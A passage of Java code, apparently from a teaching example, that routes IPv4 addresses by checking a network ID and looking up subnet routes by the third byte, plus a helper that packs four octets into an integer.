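            if (((addr >>> 16) & 0xFFFF) != NETID)        // not our network:
                return "default gateway";                 // send it outside
            int subnet = (addr >>> 8) & 0xFF;             // third byte = subnet
            return subnetRoutes.getOrDefault(subnet, "unknown subnet");
        }

        static int ip(int a, int b, int c, int d) {
            return (a << 24) | (b << 16) | (c << 8) | d;
        }
    }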
